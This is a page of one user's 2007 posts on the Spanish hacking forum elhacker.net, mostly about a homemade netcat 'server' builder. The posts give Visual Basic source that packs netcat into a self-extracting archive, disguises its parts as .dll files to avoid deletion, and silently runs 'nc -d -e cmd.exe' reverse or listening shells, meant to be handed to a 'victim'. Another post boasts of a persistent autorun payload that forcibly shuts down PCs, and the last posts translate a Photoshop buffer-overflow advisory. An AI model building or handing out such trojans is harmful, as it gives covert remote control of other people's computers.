elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 ... 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 [450] 451 452 453 454 455 456
4491  Seguridad Informática / Hacking / Re: Jugando con netcat en: 2 Mayo 2007, 04:13 am
join.dll es un ejecutable winrar SFX donde dentro está el ejecute_invisible.exe ... lo que hace el programa es renombrar nc.dll a %random%.exe y a rar.dll a rar.exe y con todo eso comprimir el %random%.exe + ejecutar.txt dentro del rar ejecutable con el nombre propuesto en text1.text
si kieres verlo puedes abrirlo extrayendo ficheros con winrar... es mas.. al servidor puedes cambiarle el icono con el mismo winrar y es completamente configurable para el que tenga conocimientos un poco mas avanzados, pero por ahora asi como está es ideal para los que re100 estan aprendiendo. y ojo que las librerias no deben ir en ningun otro lado que no sea en el mismo directorio (carpeta) donde está el programa ya que no son dll reales... como dije.. no se mucho de programación asi que use la imaginación para juntar el rar en modo consola y un winrar sfx para que el servidor-nc haga las configuraciones necesarias sobre ellos.
4492  Seguridad Informática / Hacking / Re: Jugando con netcat en: 1 Mayo 2007, 23:46 pm
Para nada compadre... en realidad el nc.dll es el mismo netcat con extension .dll para que no lo borren :p, es mas... renombra nc.dll a nc.exe y veras el netcat con el icono modificado por el resourcehack, el rar.dll es el rar.exe utilizado para crear el empaquetado en modo consola... el join.dll es la base de otro programa que hice comprimido para que se fusione con el netcar mas las instrucciones dadas por el server-nc.. en realidad hace un copy join.dll %random%.exe donde %random%.exe [comando]
Con esto de %random% lo hice para que puedas enviar todas las shells que quieras sin que te cause nungun problema al dar una segunda.
En otras palabras realmente no son dlls sino partes del mismo progrma que les puse extension dll para que no los borraran y funcionaran como dependencias.
--------------------------------------------------------
También incluí en las descargas el Ejecute Invisible 1.0 que tuve que hacer en visual basic para poder ejecutar el netcat... está con codigo fuente y todo:

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long

Private Sub Form_Load()
On Error Resume Next
Dim LTD As String, F As Variant
Open App.Path & "\ejecutar.txt" For Input As FreeFile
Input #1, LTD
Text1.Text = LTD
Close #1

Dim hShell As Long
Dim sCmd As String

sCmd = "cmd /c " & Text1.Text
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End
End Sub
'Creado por WHK para el foro de elhacker.net


Como se ve no se mucho de programación pero si tengo harto ingenio :p

Como siempre en http://512.iespana.es/nc
Este espacio en mi web es exclusivo para el foro y no para todo el resto del publico para que despues no digan que me cuelgo del foro para levantar mi web  :P ademas no lo necesito
4493  Seguridad Informática / Abril negro / Re: Abril Negro 2007 en: 1 Mayo 2007, 08:18 am
Ha llegado mayo y ha sido sacado la  chincheta de este post asi que creo que ya fue bastante por ahora  :P ademas no creo que alguno le haya sacado mucho provecho aparte de aprender un poquito mas de programacion en batch.
Para el proximo año tendré mas presente este tema.
4494  Seguridad Informática / Hacking / Re: Jugando con netcat en: 1 Mayo 2007, 07:10 am
Servidor NC 1.2

Bueno.. hice un programa bastante improvisado pero bastante efectivo para solucionar el problema de muchos...
La ides de este programa es crear servidores de netcat.... solo le pasas a la victima el ejecutable y ya tienes la shell sin compilar nada.
Lo bueno es que cuando abres la carnada no se ve ni un pantallazo del DOS como se hacia antes.



Tanto el programa como el codigo fuente está disponible como siempre en http://512.iespana.es/nc

Codigo:

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long

Private Sub Command1_Click()
sCmd = "copy join.dll " + Text7.Text + ".exe&&copy rar.dll rar.exe&&Echo set nc=%random%.exe > make.bat&&Echo copy nc.dll %nc% >> make.bat&&Echo Echo %nc% " + Text4.Text + " " + Text5.Text + " ^^^|cmd.exe^^^| " + Text4.Text + " " + Text6.Text + " -d ^> ejecutar.txt >> make.bat&&Echo rar a " + Text7.Text + ".exe -m5 -n ejecutar.txt %nc% >> make.bat&&Echo del /f /q ejecutar.txt >> make.bat&&Echo del /f /q %nc% >> make.bat&&make.bat&&del /f /q make.bat&&del /f /q rar.exe"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub

Private Sub Command2_Click()
sCmd = "copy join.dll " + Text7.Text + ".exe&&copy rar.dll rar.exe&&Echo set nc=%random%.exe > make.bat&&Echo copy nc.dll %nc% >> make.bat&&Echo Echo %nc% -d -e cmd.exe " + Text2.Text + " " + Text3.Text + " ^> ejecutar.txt >> make.bat&&Echo rar a " + Text7.Text + ".exe -m5 -n ejecutar.txt %nc% >> make.bat&&Echo del /f /q ejecutar.txt >> make.bat&&Echo del /f /q %nc% >> make.bat&&make.bat&&del /f /q make.bat&&del /f /q rar.exe"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub

Private Sub Command3_Click()
Dim hShell As Long
Dim sCmd As String

sCmd = "copy join.dll " + Text7.Text + ".exe&&copy rar.dll rar.exe&&Echo set nc=%random%.exe > make.bat&&Echo copy nc.dll %nc% >> make.bat&&Echo Echo %nc% -L -d -e cmd.exe -p " + Text1.Text + " ^> ejecutar.txt >> make.bat&&Echo rar a " + Text7.Text + ".exe -m5 -n ejecutar.txt %nc% >> make.bat&&Echo del /f /q ejecutar.txt >> make.bat&&Echo del /f /q %nc% >> make.bat&&make.bat&&del /f /q make.bat&&del /f /q rar.exe"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)

End Sub

Private Sub Command4_Click()
End
End Sub

Private Sub Command5_Click()
Form2.Show
End Sub

Private Sub Form_Unload(Cancel As Integer)
On Error Resume Next
Unload Me
Form2.Hide
End
End Sub
'Creado por WHK para el foro de elhacker.net
4495  Seguridad Informática / Hacking / Re: Jugando con netcat en: 1 Mayo 2007, 06:26 am
Claro... ningun problema... buscaré información sobre coneccciones en IRC y MSN messenger atraves del netcat ya que con un papper que vi puedes telnetear a MSN y porque no transformar tu netcat en un cliente mas  ;D

Por lo visto el correo si te funcionó bien.. solo que tienes problemas para resolver los dominios de mx*.hotmail.com y eso deve ser a que:

1. Estas baneado por bombardear  :xD
2. Tu firewall no te permite tener acceso a servidores MSTP. Algunos antivirus vienen con esa opcion predeterminada para evitar el envio descontrolado de correos.
3. ping -n 1 mx1.hotmail.com Si no responde es porque de alguna forma tu pc no te permite el acceso a el.
4. Microsoft en banca rota Aunque eso lo dudo mucho  :xD
4496  Seguridad Informática / Hacking / Re: Jugando con netcat en: 30 Abril 2007, 01:48 am
cliente-nc 1.9 actualizado:



ya casi termino... cuando lo haga lo pongo acá.
4497  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Carita nueva en: 29 Abril 2007, 12:30 pm
Bueno... muchas gracias a ustedes porque no hubiera podido pedirlo solo  :P

Gracias a todos!.
4498  Seguridad Informática / Abril negro / Re: Abril Negro 2007 en: 29 Abril 2007, 00:42 am
ps si inician en modo a prueva de fallos pueden eliminar muy facilmente la entrada de registro sin que pase nada grave ni que se reinicie la pc... pero si puedes injectar un servicio que haga que te reinicie la pc, otro en menu inicio/run, otro en el reg, otro reemplazando a winlogon.exe  :P y asi y ps una ves lo hice con un CD de musica hibrido para que no los pudieran copiar y ni aún en prueva de fallos pudo resolver el problema porque igual se le reiniciaba e hice que se duplicara 5 veces por cada encendida de pc con nuevas entradas de registros e injecciones en algunos dll etc etc...
En este caso no usé el comando shutdown sino un programa de apagado automatico que recibia ordenes en modo consola que forzaba la detención de todos los procesos y hacia todo lo posible para que la pc se apagara si o si ya que Aunque tengas un notepad sin guardar ps el shutdown no funciona.
Es ideal para que no te pirateen los CDs de musica que vendes o los videos VCD  :P solo basta con hacerle un autorun tanto al vcd dat como al hibrido de datos combinado con pistas de audio.
4499  Media / Diseño Gráfico / Re: ¡¡CUIDADO!! Exploit remoto de Adobe Photoshop CS2 y CS3 en: 27 Abril 2007, 05:49 am
No es que si abres cualkier archivo con extención BMP te explote... solo que si alguien malintencionadamente te da o encuentras por ahi imagenes con extención BMP, DIB o RLE puede que te explote la fuente de poder al abrirlos con photoshop CS2 y CS3  :xD es broma... no explota la fuente de poder pero si comprometer todo tu sistema... pero si es un archivo sin malas intenciones entonces todo funciona de maravilla (ojo que aún no hay parches disponibles ni actualizaciones por lo cual deben andar circulando ya algunas imagenes que te dejan un hermoso backdoor  :P
4500  Media / Diseño Gráfico / Re: ¡¡CUIDADO!! Exploit remoto de Adobe Photoshop CS2 y CS3 en: 26 Abril 2007, 18:08 pm
ORIGINAL

Adobe Photoshop Multiple File Format Handling Client-Side Code Execution Vulnerability
 
Advisory ID : FrSIRT/ADV-2007-1523
CVE ID : GENERIC-MAP-NOMATCH
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2007-04-24
 Technical Description         

A vulnerability has been identified in Adobe Photoshop, which could be exploited by attackers to cause a denial of service or execute arbitrary code. This issue is caused by buffer overflow errors when handling a malformed "BMP", "DIB" or "RLE" file, which could be exploited by attackers to take complete control of an affected system by tricking a user into opening a specially crafted file using a vulnerable application.

Affected Products

Adobe Photoshop CS3
Adobe Photoshop CS2

Solution

The FrSIRT is not aware of any official supplied patch for this issue.

References

http://www.frsirt.com/english/advisories/2007/1523

Credits

Vulnerability reported by Marsu

ChangeLog

2007-04-24 : Initial release

Vulnerability Management

Receive up-to-the-minute alerts when new vulnerabilities, exploits, or patches relevant to your systems and network configurations are available. Subscribe to FrSIRT VNS.

Feedback

If you have additional information or corrections for this security advisory please submit them via our contact form or by email to updates@frsirt.com.
-------------------------------------------------------------------

TRADUCCIÓN

Formato múltiple del archivo de Photoshop del adobe que maneja vulnerabilidad de la ejecución del código del Cliente-Lado
 
Identificación consultiva: FrSIRT/ADV-2007-1523
IDENTIFICACIÓN DE CVE: GENERIC-MAP-NOMATCH
Clasificado como: Crítico
Remotamente explotable: Sí
Localmente explotable: Sí
Fecha del lanzamiento: 2007-04-24
 Descripción técnica           

Una vulnerabilidad se ha identificado en el adobe Photoshop, que se podría explotar por los atacantes para causar una negación del servicio o para ejecutar código arbitrario. Esta edición es causada por errores del desbordamiento del almacenador intermediario al manejar un archivo malformado de “BMP”, de “DIB” o de “RLE”, que se podría explotar por los atacantes para tomar control completo de un sistema afectado trampeando a un usuario en abrir un archivo especialmente hecho a mano usando un uso vulnerable.

Productos afectados

Adobe Photoshop CS3
Adobe Photoshop CS2

Solución

El FrSIRT no está enterado de ningún remiendo proveído oficial para esta edición.

Referencias

http://www.frsirt.com/english/advisories/2007/1523

Créditos

La vulnerabilidad divulgó por Marsu

ChangeLog

2007-04-24: Lanzamiento inicial

Gerencia de la vulnerabilidad

Recibir las alarmas up-to-the-minute cuando las vulnerabilidades, las hazañas, o los remiendos nuevos relevantes a tus sistemas y configuraciones de red están disponibles. Suscribir a FrSIRT VNS.

Regeneración

Si haces que la información o las correcciones adicional para esta seguridad consultiva por favor las someta vía nuestra forma del contacto o por el email a updates@frsirt.com.

-------------------------------------------------------------

En otras palabras puedo pasarte un bmp modificado de tal manera que pueda explotar una shell o lo que se me antoje... en otras palabras hay imagenes en bmp que si los abres con el photoshop CS2 Y CS3 te explotan en la cara :xD
Páginas: 1 ... 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 [450] 451 452 453 454 455 456
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines